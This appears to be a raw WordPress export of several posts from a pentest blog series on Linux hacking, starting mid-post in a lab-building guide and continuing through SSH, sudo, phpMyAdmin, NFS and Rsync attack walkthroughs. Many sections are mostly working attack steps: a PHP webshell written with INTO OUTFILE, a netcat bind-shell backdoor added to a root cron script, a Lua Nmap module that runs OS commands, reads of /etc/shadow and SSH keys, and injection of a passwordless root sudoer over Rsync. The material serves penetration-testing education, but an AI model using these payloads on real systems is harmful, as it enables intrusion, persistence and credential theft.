mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install PHPMyAdmin

Alrighty, time to install phpMyAdmin.
apt-get install phpmyadmin
Eventually you will be presented with a GUI. Follow the instructions below.
  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator's password, which should be set to "password" to match the lab.
After the installation we still have a few things to do. Let's create a soft link in the webroot to phpmyadmin.
ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin
Then, let's restart the required services:
service apache2 restart
service mysql restart
Next, let's add the admin user we'll be guessing later.
mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit
Finally, configure excessive privileges in the webroot just for fun:
cd /var/www/
chown -R www-data *
chmod -R 777 *
Web it's all done you should be able to verify the setup by logging into https://127.0.0.1/phymyadmin as the "admin" user with a password of "password". Php

Create a World Writable Script

Next up, let's make a world writable script that will be executed by a cron job.
mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts
Create Root Cron Job Now, let's configure a root cron job to execute the script every minute.
echo "* * * * * /scripts/rootcron.sh" > mycron
You can then verify the cron job was added with the command below.
crontab -l
Cron

Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands. Create Encrypted Password The command below will allow you create create an encrypted password for generating test users. I originally found this guidance from https://askubuntu.com/questions/94060/run-adduser-non-interactively.
openssl passwd -crypt test
Next you can add new users using the generate password below.  This is not required, but handy for scripting out environments.
useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser
Create an Insecure Sudoers Configuration The sudoers configuration below with allow vi, nmap, python, and sh to be executed as root by test and user1.
echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
When its all done you can log in as the previously created test user to verify the sudo application are available: Sudo

Wrap Up

In this blog we covered how to configure your own vulnerable Linux server, so you can learn in a safe environment.  Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new the security community.  Stay safe and hack responsibly! [post_title] => Linux Hacking Case Studies Part 5: Building a Vulnerable Linux Server [post_excerpt] => This blog will share how to configure your own vulnerable Linux server so you can practice building and breaking at home. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-5-building-a-vulnerable-linux-server [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:23 [post_modified_gmt] => 2021-06-08 21:59:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11391 [menu_order] => 513 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 11375 [post_author] => 17 [post_date] => 2020-03-26 07:00:16 [post_date_gmt] => 2020-03-26 07:00:16 [post_content] =>

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk -F ' ' '{print $2} '> ssh.txt
cat ssh.txt

Dictionary Attacks against SSH Servers

Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn’t mean it’s not effective.  We see default and weak SSH passwords configured in at least a half of the environments we look at.

If you haven't done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

In this scenario let’s assume we’re going to test for common user name and password combinations.  That means we'll need a file containing a list of users and a file containing a list of passwords.  Kali ships with some good word lists that provide coverage for common user names and passwords.  Many can be found in the /usr/share/wordlists/.

Wordlists

While those can be handy, for this scenario we're going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks for most management protocols.  Most of those modules use the protocol_login naming standard. Example: ssh_login . Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/password.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.

Guessedsshpassword

Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.

Sudo


Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, UnixPrivsEsc, etc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is configuration file in Linux that defines what commands can be run as what user.  It’s also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

Sudo
In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh
Sudo


Exploiting Sudo VI

VI is a text editor that's installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configurations files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means, if you provided a user sudo access to VI, then you have effectively provided them with root access to your server.

Below is a command example:

vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.

Vibreakout

Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python –c “import os;os.system(‘whoami’)”

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let's assume we can run Nmap using sudo and now we want to use it's functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions using the -–interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we'll keep it simple.

Let's assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec --script-args='command=whoami'
Sudo
nmap --script=./exec --script-args='command=cat /etc/shadow'
Sudo

Now, you can see we're able to run arbitrary commands in the root user's context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I've never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new the security community.  Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 4: Sudo Horror Stories [post_excerpt] => This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-4-sudo-horror-stories [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:32 [post_modified_gmt] => 2022-04-04 15:01:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11375 [menu_order] => 514 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 11333 [post_author] => 17 [post_date] => 2020-03-25 07:00:52 [post_date_gmt] => 2020-03-25 07:00:52 [post_content] =>

This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It's often used as part of open source projects and as a result some administrators don't realize that it's been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let's talk about findings phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we're going to assume that all of our tests are being conducted from a system that's in a NATed environment.  Meaning that we're pretending to connect to a SSH server that is exposed to the internet through a firewall, but the environment we're attacking is on the other side of the firewall.

Finding PHPMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory,  but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge let's start searching for web serves that might be hosting phpMyAdmin instances using our favorite port scanner Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171.  In most cases you wont have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies are out of scope for this blog, but below is my attempt to illustrate what we're doing.

Tunnel

Below are a couple of options for SSH tunnling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client

Once port forwarding is configured, we're able to access phpMyAdmin by navigating to https://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we've found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we'll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you're performing dictionary attacks against to ensure that you don't cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we'll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpMyAdmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.

Bf

If the dictionary attack discovers valid credentials, you're ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading WebShells through PHPMyAdmin

Now that we've guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we're going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments writing a webshell to the webroot through SQL injection wouldn't work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard, but LAMP, WAMP, and XAMPP are other examples. It's also worth noting that in some environments the mysql services account may not have write access to the webroot or phhMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the "SQL" button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT "<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET['cmd']) {​​system($_GET['cmd']);}​​ ?> </pre></BODY></HTML>"

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'

The actual code can be downloaded here, but below is screenshot showing it in context.

Uploadwebshell

The webshell should now be available at https://127.0.0.1:2222/phpMyAdmin/cmd.php.  With that in hand we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami 
ls –al
ls /
Ls

Below is a quick video illustrating the process.

Note: When you're all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you're not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren’t implicitly bad, but when those files are directly or indirectly executed by the root user they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we'll run through our webshell to locate potentially exploitable world writable files.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
Ww A

From here we can start exploring some of the affected files and looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable.  It appears to contain a script that is run by the a root cron job.  While this isn’t incredibly common, we have seen it in the wild.  The general idea can be applied to sudo scripts as well.  There are a lot of things we could write to the root cron job script, but for fun we are going to add a line to the script that will start a netcat listener as root.  Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh
Scriptdirectory

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh
Writetoscript

You’ll have to wait for the cron job to trigger, but after that you should be able to connect the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w
Rootshell

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn’t a common occurrence we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.   However, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world writable script being executed by a root cron job . While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets, and often support functionality that can lead to command execution.  Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 3: phpMyAdmin [post_excerpt] => This blog will walkthrough how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-3-phpmyadmin [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:03 [post_modified_gmt] => 2021-06-08 21:59:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11333 [menu_order] => 516 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 11309 [post_author] => 17 [post_date] => 2020-03-24 07:00:52 [post_date_gmt] => 2020-03-24 07:00:52 [post_content] =>

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for a NFS refresher. This is the second of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.  The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things, mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It's also worth noting that IP and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user's UID, which can be spoofed.  However, it should be noted that there are some mitigating controls such as "root squashing", that can be enabled in /etc/exports to prevent access from a UID of 0 (root).

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is a overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).

Below is an attempt at illustrating the scenario.

Nfs

Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049.  Use common tools like nmap identify open NFS ports.

nmap -sS -pT:2049,111,U:2049,111 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap
Nfs

Use common tools like nmap or rpcinfo to determine the versions of NFS currently supported. This may be important later. We want to force the use of version 3 or below so we can list and impersonate the UID of the file owners. If root squashing is enabled that may be a requirement for file access.

Enumerate support NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate support NFS versions with rpcinfo:

apt-get install nfs-client
rpcinfo -p 192.168.1.171
Nfs

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run
Nfs

Showmount example:

apt-get install samba
showmount -e 192.168.1.171
Nfs

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo
Nfs

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).

List UIDs using mounted drive:

ls -an
Nfs

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111
Nfs

Searching for Passwords and Private Keys (User Access)

Alrighty, let’s assume you were able to access the NFS with root or another user.  Now it’s time to try to find passwords and keys to access the remote server.  Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt
Nfs

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa
Nfs

Below is a short via showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least privilege user (test), there are lots of privilege escalation paths we could take, but let's focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary's owner.  Similarly, binaries configured with the setguid flag, which allow users to execute the flag binary as the group associated with the file.  This can be a good and bad thing for system administrators.

  • The Good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The Bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setguid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setguid Binaries

find / -perm -g=s -type f 2>/dev/null

Below is an example screenshot you might encounter during a pentest.

Nfs

Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real world scenarios you'll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami
Nfs

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and insecure setuid binary . While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 2: NFS [post_excerpt] => This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-2-nfs [to_ping] => [pinged] => [post_modified] => 2022-04-01 14:23:33 [post_modified_gmt] => 2022-04-01 19:23:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11309 [menu_order] => 517 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11299 [post_author] => 17 [post_date] => 2020-03-23 07:00:05 [post_date_gmt] => 2020-03-23 07:00:05 [post_content] =>

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for a Rsync refresher. This will be the first of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what's the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things, file share access and file permissions.

  1. File Share Access can be defined in /etc/Rsyncd.conf to provide anonymous or authenticated access.
  2. File Permissions can also be defined in /etc/Rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example of Rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/Rsyncd.log
pid file = /var/run/Rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 –oA Rsync_scan
grep –i "open" Rsync_scan.gnmap
Rsync

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List directory

rsync 192.168.1.171::

List sub directory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/
Rsync

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/
Rsync

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test
Rsync

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains user information such as home directories and encrypted passwords. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
  3. Download /etc/shadow. (and backup)
  4. Append the new user to the end of /etc/shadow
  5. Upload / Overwrite the existing /etc/shadow

Note: Make sure to create a new user that doesn’t already exist on the system. ;)

Create Encrypted Password:

openssl passwd -crypt password123

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/group file. :) In this case the UID/GUID are 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted password. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change to uid, but make sure it matches the value set in the /etc/passwd file. :) In this case the UID/GUID are 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject a entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and sudo sh to root!

Attacking Rsync Demo Video

